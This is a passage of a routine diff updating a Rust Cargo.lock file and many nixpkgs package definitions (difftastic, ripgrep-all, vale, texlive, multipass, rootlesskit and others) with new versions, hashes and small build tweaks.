source = "registry+https://github.com/rust-lang/crates.io-index" @@ -388,11 +382,12 @@ checksum = "ab5ef0d4909ef3724cc8cce6ccc8572c5c817592e9285f5464f8e86f8bd3726e" [[package]] name = "hashbrown" -version = "0.12.3" +version = "0.14.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8a9ee70c43aaf417c914396645a0fa852624801b24ebb7ae78fe8272889ac888" +checksum = "290f1a1d9242c78d09ce40a5e87e7554ee637af1351968159f4952f028f75604" dependencies = [ "ahash", + "allocator-api2", ] [[package]] @@ -467,7 +462,7 @@ checksum = "eae7b9aee968036d54dce06cebaefd919e4472e753296daccd6d344e3e2df0c2" dependencies = [ "hermit-abi 0.3.3", "libc", - "windows-sys 0.48.0", + "windows-sys", ] [[package]] @@ -479,7 +474,7 @@ dependencies = [ "hermit-abi 0.3.3", "io-lifetimes", "rustix", - "windows-sys 0.48.0", + "windows-sys", ] [[package]] @@ -547,9 +542,9 @@ checksum = "ef53942eb7bf7ff43a617b3e2c1c4a5ecf5944a7c1bc12d7ee39bbb15e5c1519" [[package]] name = "lock_api" -version = "0.4.9" +version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "435011366fe56583b16cf956f9df0095b405b82d76425bc8981c0e22e60ec4df" +checksum = "3c168f8615b12bc01f9c17e2eb0cc07dcae1940121185446edc3744920e8ef45" dependencies = [ "autocfg", "scopeguard", @@ -566,9 +561,9 @@ dependencies = [ [[package]] name = "memchr" -version = "2.5.0" +version = "2.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2dffe52ecf27772e601905b7522cb4ef790d2cc203488bbd0e2fe85fcb74566d" +checksum = "523dc4f511e55ab87b694dc30d0f820d60906ef06413f93d4d7a1385599cc149" [[package]] name = "memoffset" @@ -596,14 +591,14 @@ checksum = "68354c5c6bd36d73ff3feceb05efa59b6acb7626617f4962be322a825e61f79a" [[package]] name = "mio" -version = "0.8.5" +version = "0.8.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e5d732bc30207a6423068df043e3d02e0735b155ad7ce1a6f76fe2baa5b158de" +checksum = "8f3d0b296e374a4e6f3c7b0a1f5a51d748a0d34c85e7dc48fc3fa9a87657fe09" dependencies = [ "libc", "log", "wasi", - "windows-sys 0.42.0", + "windows-sys", ] [[package]] @@ -643,9 +638,9 @@ dependencies = [ [[package]] name = "once_cell" -version = "1.17.1" +version = "1.19.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b7e5500299e16ebb147ae15a00a942af264cf3688f47923b8fc2cd5858f23ad3" +checksum = "3fdb12b2476b595f9358c5161aa467c2438859caa136dec86c26fdd2efe17b92" [[package]] name = "os_str_bytes" @@ -680,15 +675,15 @@ dependencies = [ [[package]] name = "parking_lot_core" -version = "0.9.6" +version = "0.9.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ba1ef8814b5c993410bb3adfad7a5ed269563e4a2f90c41f5d85be7fb47133bf" +checksum = "4c42a9226546d68acdd9c0a280d17ce19bfe27a46bf68784e4066115788d008e" dependencies = [ "cfg-if", "libc", "redox_syscall", "smallvec", - "windows-sys 0.42.0", + "windows-targets", ] [[package]] @@ -755,18 +750,18 @@ dependencies = [ [[package]] name = "proc-macro2" -version = "1.0.66" +version = "1.0.78" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18fb31db3f9bddb2ea821cde30a9f70117e3f119938b5ee630b7403aa6e2ead9" +checksum = "e2422ad645d89c99f8f3e6b88a9fdeca7fabeac836b1002371c4367c8f984aae" dependencies = [ "unicode-ident", ] [[package]] name = "quote" -version = "1.0.32" +version = "1.0.35" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "50f3b39ccfb720540debaa0164757101c08ecb8d326b15358ce76a62c7e85965" +checksum = "291ec9ab5efd934aaf503a6466c5d5251535d108ee747472c3977cc5acc868ef" dependencies = [ "proc-macro2", ] @@ -801,22 +796,22 @@ dependencies = [ [[package]] name = "redox_syscall" -version = "0.2.16" +version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fb5a58c1855b4b6819d59012155603f0b22ad30cad752600aadfcb695265519a" +checksum = "4722d768eff46b75989dd134e5c353f0d6296e5aaa3132e776cbdb56be7731aa" dependencies = [ "bitflags 1.3.2", ] [[package]] name = "regex" -version = "1.9.4" +version = "1.9.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "12de2eff854e5fa4b1295edd650e227e9d8fb0c9e90b12e7f36d6a6811791a29" +checksum = "ebee201405406dbf528b8b672104ae6d6d63e6d118cb10e4d51abbc7b58044ff" dependencies = [ "aho-corasick", "memchr", - "regex-automata 0.3.7", + "regex-automata 0.3.9", "regex-syntax", ] @@ -828,9 +823,9 @@ checksum = "6c230d73fb8d8c1b9c0b3135c5142a8acee3a0558fb8db5cf1cb65f8d7862132" [[package]] name = "regex-automata" -version = "0.3.7" +version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "49530408a136e16e5b486e883fbb6ba058e8e4e8ae6621a77b048b314336e629" +checksum = "59b23e92ee4318893fa3fe3e6fb365258efbfe6ac6ab30f090cdcbb7aa37efa9" dependencies = [ "aho-corasick", "memchr", @@ -860,7 +855,7 @@ dependencies = [ "io-lifetimes", "libc", "linux-raw-sys", - "windows-sys 0.48.0", + "windows-sys", ] [[package]] @@ -907,7 +902,7 @@ checksum = "a4e7b8c5dc823e3b90651ff1d3808419cd14e5ad76de04feaf37da114e7a306f" dependencies = [ "proc-macro2", "quote", - "syn 2.0.27", + "syn 2.0.49", ] [[package]] @@ -944,18 +939,18 @@ dependencies = [ [[package]] name = "signal-hook-registry" -version = "1.4.0" +version = "1.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e51e73328dc4ac0c7ccbda3a494dfa03df1de2f46018127f60c693f2648455b0" +checksum = "d8229b473baa5980ac72ef434c4415e70c4b5e71b423043adb4ba059f89c99a1" dependencies = [ "libc", ] [[package]] name = "smallvec" -version = "1.10.0" +version = "1.13.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a507befe795404456341dfab10cef66ead4c041f62b8b11bbb92bffe5d0953e0" +checksum = "e6ecd384b10a64542d77071bd64bd7b231f4ed5940fba55e98c3de13824cf3d7" [[package]] name = "strsim" @@ -982,7 +977,7 @@ dependencies = [ "proc-macro2", "quote", "rustversion", - "syn 2.0.27", + "syn 2.0.49", ] [[package]] @@ -998,9 +993,9 @@ dependencies = [ [[package]] name = "syn" -version = "2.0.27" +version = "2.0.49" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b60f673f44a8255b9c8c657daf66a596d435f2da81a555b06dc644d080ba45e0" +checksum = "915aea9e586f80826ee59f8453c1101f9d1c4b3964cd2460185ee8e299ada496" dependencies = [ "proc-macro2", "quote", @@ -1018,12 +1013,12 @@ dependencies = [ [[package]] name = "terminal_size" -version = "0.1.17" +version = "0.2.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "633c1a546cee861a1a6d0dc69ebeca693bf4296661ba7852b9d21d159e0506df" +checksum = "8e6bf6f19e9f8ed8d4048dc22981458ebcf406d67e94cd422e5ecd73d63b3237" dependencies = [ - "libc", - "winapi", + "rustix", + "windows-sys", ] [[package]] @@ -1034,9 +1029,9 @@ checksum = "507e9898683b6c43a9aa55b64259b721b52ba226e0f3779137e50ad114a4c90b" [[package]] name = "textwrap" -version = "0.15.0" +version = "0.16.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1141d4d61095b28419e22cb0bbf02755f5e54e0526f97f1e3d1d160e60885fb" +checksum = "23d434d3f8967a09480fb04132ebe0a3e088c173e6d0ee7897abbdf4eab0f8b9" dependencies = [ "terminal_size", ] @@ -1162,21 +1157,6 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "windows-sys" -version = "0.42.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a3e1820f08b8513f676f7ab6c1f99ff312fb97b553d30ff4dd86f9f15728aa7" -dependencies = [ - "windows_aarch64_gnullvm 0.42.1", - "windows_aarch64_msvc 0.42.1", - "windows_i686_gnu 0.42.1", - "windows_i686_msvc 0.42.1", - "windows_x86_64_gnu 0.42.1", - "windows_x86_64_gnullvm 0.42.1", - "windows_x86_64_msvc 0.42.1", -] - -[[package]] -name = "windows-sys" version = "0.48.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9" @@ -1190,95 +1170,53 @@ version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c" dependencies = [ - "windows_aarch64_gnullvm 0.48.5", - "windows_aarch64_msvc 0.48.5", - "windows_i686_gnu 0.48.5", - "windows_i686_msvc 0.48.5", - "windows_x86_64_gnu 0.48.5", - "windows_x86_64_gnullvm 0.48.5", - "windows_x86_64_msvc 0.48.5", + "windows_aarch64_gnullvm", + "windows_aarch64_msvc", + "windows_i686_gnu", + "windows_i686_msvc", + "windows_x86_64_gnu", + "windows_x86_64_gnullvm", + "windows_x86_64_msvc", ] [[package]] name = "windows_aarch64_gnullvm" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c9864e83243fdec7fc9c5444389dcbbfd258f745e7853198f365e3c4968a608" - -[[package]] -name = "windows_aarch64_gnullvm" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8" [[package]] name = "windows_aarch64_msvc" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4c8b1b673ffc16c47a9ff48570a9d85e25d265735c503681332589af6253c6c7" - -[[package]] -name = "windows_aarch64_msvc" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc" [[package]] name = "windows_i686_gnu" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "de3887528ad530ba7bdbb1faa8275ec7a1155a45ffa57c37993960277145d640" - -[[package]] -name = "windows_i686_gnu" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e" [[package]] name = "windows_i686_msvc" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf4d1122317eddd6ff351aa852118a2418ad4214e6613a50e0191f7004372605" - -[[package]] -name = "windows_i686_msvc" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406" [[package]] name = "windows_x86_64_gnu" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c1040f221285e17ebccbc2591ffdc2d44ee1f9186324dd3e84e99ac68d699c45" - -[[package]] -name = "windows_x86_64_gnu" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e" [[package]] name = "windows_x86_64_gnullvm" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "628bfdf232daa22b0d64fdb62b09fcc36bb01f05a3939e20ab73aaf9470d0463" - -[[package]] -name = "windows_x86_64_gnullvm" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc" [[package]] name = "windows_x86_64_msvc" -version = "0.42.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "447660ad36a13288b1db4d4248e857b510e8c3a225c822ba4fb748c0aafecffd" - -[[package]] -name = "windows_x86_64_msvc" version = "0.48.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538" @@ -1294,3 +1232,23 @@ name = "yansi" version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "09041cd90cf85f7f8b2df60c646f853b7f535ce68f85244eb6731cf89fa498ec" + +[[package]] +name = "zerocopy" +version = "0.7.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "74d4d3961e53fa4c9a25a8637fc2bfaf2595b3d3ae34875568a5cf64787716be" +dependencies = [ + "zerocopy-derive", +] + +[[package]] +name = "zerocopy-derive" +version = "0.7.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ce1b18ccd8e73a9321186f97e46f9f04b778851177567b1975109d26a08d2a6" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.49", +] diff --git a/nixpkgs/pkgs/tools/text/difftastic/default.nix b/nixpkgs/pkgs/tools/text/difftastic/default.nix index e5c04d1e4cd3..e1733800cdfe 100644 --- a/nixpkgs/pkgs/tools/text/difftastic/default.nix +++ b/nixpkgs/pkgs/tools/text/difftastic/default.nix @@ -17,13 +17,13 @@ in rustPlatform.buildRustPackage rec { pname = "difftastic"; - version = "0.55.0"; + version = "0.56.1"; src = fetchFromGitHub { owner = "wilfred"; repo = pname; rev = version; - hash = "sha256-ltlgZoR94BrF6FOOUnSNZf3Uagu5AZjxE7yxOwWWMzU="; + hash = "sha256-XQzsLowHtgXIKfUWx1Sj1D0F8scb7fNp33Cwfh5XvJI="; }; cargoLock = { diff --git a/nixpkgs/pkgs/tools/text/fanficfare/default.nix b/nixpkgs/pkgs/tools/text/fanficfare/default.nix index ba20910e1b8d..149082cc995f 100644 --- a/nixpkgs/pkgs/tools/text/fanficfare/default.nix +++ b/nixpkgs/pkgs/tools/text/fanficfare/default.nix @@ -2,12 +2,12 @@ python3Packages.buildPythonApplication rec { pname = "FanFicFare"; - version = "4.31.0"; + version = "4.32.3"; pyproject = true; src = fetchPypi { inherit pname version; - hash = "sha256-6AdiyL51UzK/f7wGn2UekAglGPIs4vfyYbC/MdD0aEk="; + hash = "sha256-Qfe24Ees3LLnSuU4kjn+dwtKjLBSYgF22U1YAtpw1po="; }; nativeBuildInputs = with python3Packages; [ diff --git a/nixpkgs/pkgs/tools/text/gtree/default.nix b/nixpkgs/pkgs/tools/text/gtree/default.nix index d27a2857413c..266b807c3f60 100644 --- a/nixpkgs/pkgs/tools/text/gtree/default.nix +++ b/nixpkgs/pkgs/tools/text/gtree/default.nix @@ -7,13 +7,13 @@ buildGoModule rec { pname = "gtree"; - version = "1.10.8"; + version = "1.10.9"; src = fetchFromGitHub { owner = "ddddddO"; repo = "gtree"; rev = "v${version}"; - hash = "sha256-gxX5Cq5SPDNWtwtuo35RW+N/WE0ZximxDlTi9TnTACM="; + hash = "sha256-3OXrKt3rM166JXqFuB+S0BJJkmkHPzJaWDDFeClmdM8="; }; vendorHash = "sha256-5biKUOzYaVY+52f0ewvHslAnb+BM0BuqGrU8wwA3t+E="; diff --git a/nixpkgs/pkgs/tools/text/hyx/default.nix b/nixpkgs/pkgs/tools/text/hyx/default.nix index 28b4765ede4a..f599d067f094 100644 --- a/nixpkgs/pkgs/tools/text/hyx/default.nix +++ b/nixpkgs/pkgs/tools/text/hyx/default.nix @@ -2,11 +2,11 @@ stdenv.mkDerivation rec { pname = "hyx"; - version = "2021.06.09"; + version = "2024.02.29"; src = fetchurl { url = "https://yx7.cc/code/hyx/hyx-${lib.replaceStrings [ "-" ] [ "." ] version}.tar.xz"; - sha256 = "sha256-jU8U5YWE1syPBOQ8o4BC7tIYiCo4kknCCwhnMCVtpes="; + sha256 = "sha256-dufx3zsabeet7Rp0d60MIuNqisIQd6UgE7WDZYNHl3E="; }; postPatch = lib.optionalString stdenv.isDarwin '' diff --git a/nixpkgs/pkgs/tools/text/riffdiff/default.nix b/nixpkgs/pkgs/tools/text/riffdiff/default.nix index ebd4a7dc0a7a..72b3dfc14a1a 100644 --- a/nixpkgs/pkgs/tools/text/riffdiff/default.nix +++ b/nixpkgs/pkgs/tools/text/riffdiff/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "riffdiff"; - version = "2.30.1"; + version = "3.0.0"; src = fetchFromGitHub { owner = "walles"; repo = "riff"; rev = version; - hash = "sha256-+bYQrZBbMnlDRZBM252i3dvSpLfW/ys4bBe9mDCvHuU="; + hash = "sha256-lS7+sLA/6ZxieodvSPuEzawxQb2vWdNCkGy1RTbg4dY="; }; - cargoHash = "sha256-aJc3OcnSE4xo8FdSVt4YYX3i5NZT9GaczlFrbCw+iRo="; + cargoHash = "sha256-hGy0B2uLT37wKOvC4/wc8i+v1vEQ3bzrgm/yqRCAx3s="; meta = with lib; { description = "A diff filter highlighting which line parts have changed"; diff --git a/nixpkgs/pkgs/tools/text/ripgrep-all/default.nix b/nixpkgs/pkgs/tools/text/ripgrep-all/default.nix index 9844a72f9d52..daed3da28e74 100644 --- a/nixpkgs/pkgs/tools/text/ripgrep-all/default.nix +++ b/nixpkgs/pkgs/tools/text/ripgrep-all/default.nix @@ -9,6 +9,7 @@ , ripgrep , Security , zip +, fzf }: let @@ -18,6 +19,7 @@ let poppler_utils ripgrep zip + fzf ]; in rustPlatform.buildRustPackage rec { pname = "ripgrep-all"; @@ -43,8 +45,10 @@ in rustPlatform.buildRustPackage rec { nativeCheckInputs = path; postInstall = '' - wrapProgram $out/bin/rga \ - --prefix PATH ":" "${lib.makeBinPath path}" + for bin in $out/bin/*; do + wrapProgram $bin \ + --prefix PATH ":" "${lib.makeBinPath path}" + done ''; meta = with lib; { diff --git a/nixpkgs/pkgs/tools/text/scraper/default.nix b/nixpkgs/pkgs/tools/text/scraper/default.nix index 05c4957f27dd..c148f1e57f3f 100644 --- a/nixpkgs/pkgs/tools/text/scraper/default.nix +++ b/nixpkgs/pkgs/tools/text/scraper/default.nix @@ -2,14 +2,14 @@ rustPlatform.buildRustPackage rec { pname = "scraper"; - version = "0.18.1"; + version = "0.19.0"; src = fetchCrate { inherit pname version; - hash = "sha256-fnX2v7VxVFgn9UT1+qWBvN+oDDI2DbK6UFKmby5aB5c="; + hash = "sha256-HfZ8zyjghTXIyIYS+MaGF5OdMLJv6NIjQswdn/tvQbU="; }; - cargoHash = "sha256-HeT3U4H/OM/91BdXTvZq+gpmOnt/P4wTlqc2dl4erlQ="; + cargoHash = "sha256-py8VVciNJ36/aSTlTH+Bx36yrh/8AuzB9XNNv/PrFak="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/text/ugrep/default.nix b/nixpkgs/pkgs/tools/text/ugrep/default.nix index 4dfd4c31c5f1..94a417a4b0d7 100644 --- a/nixpkgs/pkgs/tools/text/ugrep/default.nix +++ b/nixpkgs/pkgs/tools/text/ugrep/default.nix @@ -15,13 +15,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "ugrep"; - version = "5.0.0"; + version = "5.1.0"; src = fetchFromGitHub { owner = "Genivia"; repo = "ugrep"; rev = "v${finalAttrs.version}"; - hash = "sha256-VAfnj/2EdkDpcS30DveUUYLSNj07sy+gvKxyGkg2mvA="; + hash = "sha256-B3O7suGepcTUdigtumMLXGZVBVX5qUH0TVdqTY3fCXE="; }; buildInputs = [ diff --git a/nixpkgs/pkgs/tools/text/vale/default.nix b/nixpkgs/pkgs/tools/text/vale/default.nix index 16ce1b99bd46..e3d2896078ca 100644 --- a/nixpkgs/pkgs/tools/text/vale/default.nix +++ b/nixpkgs/pkgs/tools/text/vale/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "vale"; - version = "3.2.0"; + version = "3.2.2"; subPackages = [ "cmd/vale" ]; outputs = [ "out" "data" ]; @@ -11,10 +11,10 @@ buildGoModule rec { owner = "errata-ai"; repo = "vale"; rev = "v${version}"; - hash = "sha256-emAwoOFjB/zXkCLL8txs1OiMZ9DKm58eeenYFKctpzQ="; + hash = "sha256-CLbzrJJVgFxJKuTtXQKGZ6q228Sm7s+Is11TE8mAmD8="; }; - vendorHash = "sha256-cGWWjfkwgM1dAVKCl/Ao2ILyLyk0oPvqjLEZL0Clvyw="; + vendorHash = "sha256-KxIQZViUYT4cgRlOuKBwen6pqQjGiAofkeBztmjnKdQ="; postInstall = '' mkdir -p $data/share/vale diff --git a/nixpkgs/pkgs/tools/typesetting/htmldoc/default.nix b/nixpkgs/pkgs/tools/typesetting/htmldoc/default.nix index da54f7c62970..63b6e406ae09 100644 --- a/nixpkgs/pkgs/tools/typesetting/htmldoc/default.nix +++ b/nixpkgs/pkgs/tools/typesetting/htmldoc/default.nix @@ -2,12 +2,12 @@ stdenv.mkDerivation rec { pname = "htmldoc"; - version = "1.9.17"; + version = "1.9.18"; src = fetchFromGitHub { owner = "michaelrsweet"; repo = "htmldoc"; rev = "v${version}"; - sha256 = "1qq45l1vxxa970cm0wjvgj0w88hd4vsisa85pf5i54yvfzf11sqw"; + sha256 = "sha256-fibk58X0YtQ8vh8Lyqp9ZAsC79BjCptiqUA5t5Hiisg="; }; nativeBuildInputs = [ pkg-config ]; diff --git a/nixpkgs/pkgs/tools/typesetting/pulldown-cmark/default.nix b/nixpkgs/pkgs/tools/typesetting/pulldown-cmark/default.nix index 27b669a0d106..a7ef454c811f 100644 --- a/nixpkgs/pkgs/tools/typesetting/pulldown-cmark/default.nix +++ b/nixpkgs/pkgs/tools/typesetting/pulldown-cmark/default.nix @@ -5,14 +5,14 @@ rustPlatform.buildRustPackage rec { pname = "pulldown-cmark"; - version = "0.9.6"; + version = "0.10.0"; src = fetchCrate { inherit pname version; - hash = "sha256-5rCoFI+QWQVxF4YUzwP7jQytiIzTXtlOr3AJzHMdtR8="; + hash = "sha256-7ZO3MdQBNgltrd4Anu19g0Gkye6Bc2WHDuSng6mB9pM="; }; - cargoHash = "sha256-it18jXKqUE43A6KAsx+BFc7YwufXjk1FJ0u8D2EolHQ="; + cargoHash = "sha256-4UUdsS3dK5a6phwYZqjNwX52UMLLe/LHxOiBanTRMZM="; meta = { description = "A pull parser for CommonMark written in Rust"; diff --git a/nixpkgs/pkgs/tools/typesetting/tex/texlive/bin.nix b/nixpkgs/pkgs/tools/typesetting/tex/texlive/bin.nix index df4a2862516e..46ec52f75d84 100644 --- a/nixpkgs/pkgs/tools/typesetting/tex/texlive/bin.nix +++ b/nixpkgs/pkgs/tools/typesetting/tex/texlive/bin.nix @@ -3,7 +3,7 @@ , zlib, libiconv, libpng, libX11 , freetype, gd, libXaw, icu, ghostscript, libXpm, libXmu, libXext , perl, perlPackages, python3Packages, pkg-config, cmake, ninja -, libpaper, graphite2, zziplib, harfbuzz, potrace, gmp, mpfr, mupdf +, libpaper, graphite2, zziplib, harfbuzz, potrace, gmp, mpfr, mupdf-headless , brotli, cairo, pixman, xorg, clisp, biber, woff2, xxHash , makeWrapper, shortenPerlShebang, useFixedHashes, asymptote , biber-ms @@ -361,7 +361,7 @@ dvisvgm = stdenv.mkDerivation { ++ [ "--with-system-kpathsea" ]; nativeBuildInputs = [ pkg-config ]; - buildInputs = [ core brotli ghostscript zlib freetype woff2 potrace xxHash mupdf ]; + buildInputs = [ core brotli ghostscript zlib freetype woff2 potrace xxHash mupdf-headless ]; enableParallelBuilding = true; }; diff --git a/nixpkgs/pkgs/tools/typesetting/tex/texlive/build-tex-env.nix b/nixpkgs/pkgs/tools/typesetting/tex/texlive/build-tex-env.nix index 9a721168591f..85be581a3066 100644 --- a/nixpkgs/pkgs/tools/typesetting/tex/texlive/build-tex-env.nix +++ b/nixpkgs/pkgs/tools/typesetting/tex/texlive/build-tex-env.nix @@ -188,7 +188,6 @@ let passthru = lib.optionalAttrs (! __combine) (splitOutputs // { all = builtins.attrValues splitOutputs; - outputs = [ "out" ] ++ pkgList.nonEnvOutputs; }) // { # This is set primarily to help find-tarballs.nix to do its job requiredTeXPackages = builtins.filter lib.isDerivation (pkgList.bin ++ pkgList.nonbin @@ -440,14 +439,11 @@ let ; }).overrideAttrs (prev: { allowSubstitutes = true; } - # the outputsToInstall must be built by the main derivation for nix-profile-install to work // lib.optionalAttrs (! __combine) ({ - outputs = pkgList.outputsToInstall; + outputs = [ "out" ] ++ pkgList.nonEnvOutputs; meta = prev.meta // { inherit (pkgList) outputsToInstall; }; - } // (lib.mapAttrs' - (out: drv: { name = "otherOutput_" + out; value = drv; }) - (lib.getAttrs (builtins.tail pkgList.outputsToInstall) splitOutputs) - ) + } // builtins.listToAttrs + (map (out: { name = "otherOutput_" + out; value = splitOutputs.${out}; }) pkgList.nonEnvOutputs) ) ); in out) diff --git a/nixpkgs/pkgs/tools/virtualization/cloud-init/default.nix b/nixpkgs/pkgs/tools/virtualization/cloud-init/default.nix index 2bbdf2104954..dd6e6c483a33 100644 --- a/nixpkgs/pkgs/tools/virtualization/cloud-init/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/cloud-init/default.nix @@ -17,14 +17,14 @@ python3.pkgs.buildPythonApplication rec { pname = "cloud-init"; - version = "23.4.3"; + version = "23.4.4"; namePrefix = ""; src = fetchFromGitHub { owner = "canonical"; repo = "cloud-init"; rev = "refs/tags/${version}"; - hash = "sha256-oYZr0Zvo6hn9sWtgSAGgfK2stHO247f0WUbzIIWUP18="; + hash = "sha256-imA3C2895W4vbBT9TsELT1H9QfNIxntNQLsniv+/FGg="; }; patches = [ diff --git a/nixpkgs/pkgs/tools/virtualization/distrobuilder/default.nix b/nixpkgs/pkgs/tools/virtualization/distrobuilder/default.nix index da2f1a909156..fb08c7110039 100644 --- a/nixpkgs/pkgs/tools/virtualization/distrobuilder/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/distrobuilder/default.nix @@ -51,7 +51,10 @@ buildGoModule rec { ''; passthru = { - tests.incus = nixosTests.incus.container; + tests = { + incus-old-init = nixosTests.incus.container-old-init; + incus-new-init = nixosTests.incus.container-new-init; + }; generator = callPackage ./generator.nix { inherit src version; }; }; diff --git a/nixpkgs/pkgs/tools/virtualization/govc/default.nix b/nixpkgs/pkgs/tools/virtualization/govc/default.nix index 510ac24bbee4..fe4f69c9e32f 100644 --- a/nixpkgs/pkgs/tools/virtualization/govc/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/govc/default.nix @@ -2,7 +2,7 @@ buildGoModule rec { pname = "govc"; - version = "0.35.0"; + version = "0.36.0"; subPackages = [ "govc" ]; @@ -10,10 +10,10 @@ buildGoModule rec { rev = "v${version}"; owner = "vmware"; repo = "govmomi"; - sha256 = "sha256-ILmQNTHdt1rD2/cXEHlYWvXs4puNgRsrRtJmdz15zg0="; + sha256 = "sha256-laceJmheluiY120q1gqXk98mtztC9xwMd+5j3wUspas="; }; - vendorHash = "sha256-kju7wbp/LAsh4kv6edmy8+jpbeQ/OatqPwlY3Y5O9iQ="; + vendorHash = "sha256-1EAQMYaTEtfAiu7+UTkC7QZwSWC1Ihwj9leTd90T0ZU="; ldflags = [ "-s" diff --git a/nixpkgs/pkgs/tools/virtualization/kubevirt/default.nix b/nixpkgs/pkgs/tools/virtualization/kubevirt/default.nix index 519ffa83e660..d20168fc7cba 100644 --- a/nixpkgs/pkgs/tools/virtualization/kubevirt/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/kubevirt/default.nix @@ -8,13 +8,13 @@ buildGoModule rec { pname = "kubevirt"; - version = "1.1.1"; + version = "1.2.0"; src = fetchFromGitHub { owner = "kubevirt"; repo = "kubevirt"; rev = "v${version}"; - hash = "sha256-4r85RDfndLUjpAmipe3oLFcGzD4GRfPgf7wku2unoes="; + hash = "sha256-GQhynbGu3pEYYKOib0l/TfXrrLQ7TkjacWVdwFrlzEo="; }; vendorHash = null; diff --git a/nixpkgs/pkgs/tools/virtualization/multipass/default.nix b/nixpkgs/pkgs/tools/virtualization/multipass/default.nix index c746639e98ee..e7875f00bb6a 100644 --- a/nixpkgs/pkgs/tools/virtualization/multipass/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/multipass/default.nix @@ -70,8 +70,8 @@ stdenv.mkDerivation # Patch the patch of the OVMF binaries to use paths from the nix store. substituteInPlace ./src/platform/backends/qemu/linux/qemu_platform_detail_linux.cpp \ - --replace "OVMF.fd" "${OVMF.firmware}" \ - --replace "QEMU_EFI.fd" "${OVMF.firmware}" + --replace "OVMF.fd" "${OVMF.fd}/FV/OVMF.fd" \ + --replace "QEMU_EFI.fd" "${OVMF.fd}/FV/QEMU_EFI.fd" # Copy the grpc submodule we fetched into the source code. cp -r --no-preserve=mode ${grpc_src} 3rd-party/grpc @@ -122,6 +122,7 @@ stdenv.mkDerivation dnsmasq iproute2 iptables + OVMF.fd qemu qemu-utils xterm diff --git a/nixpkgs/pkgs/tools/virtualization/rootlesskit/default.nix b/nixpkgs/pkgs/tools/virtualization/rootlesskit/default.nix index cfd89ee451e6..18360fc7e212 100644 --- a/nixpkgs/pkgs/tools/virtualization/rootlesskit/default.nix +++ b/nixpkgs/pkgs/tools/virtualization/rootlesskit/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "rootlesskit"; - version = "1.1.1"; + version = "2.0.1"; src = fetchFromGitHub { owner = "rootless-containers"; repo = "rootlesskit"; rev = "v${version}"; - hash = "sha256-QjGjP7GiJiP2bJE707Oc4wZ9o/gRmSboK9xGbbyG5EM="; + hash = "sha256-qcVgLhBUVZTvXz5/QytYWzYtCKscBab/Iy25KAgzExo="; }; - vendorHash = "sha256-mNuj4/e1qH3P5MfbwPLddXWhc8aDcQuoSSHZ+S+zKWw="; + vendorHash = "sha256-ctZt0jkBhQPryEKCrd1a+ymnVKkGasZV6gOtR5U0L0I="; passthru = { updateScript = nix-update-script { }; diff --git 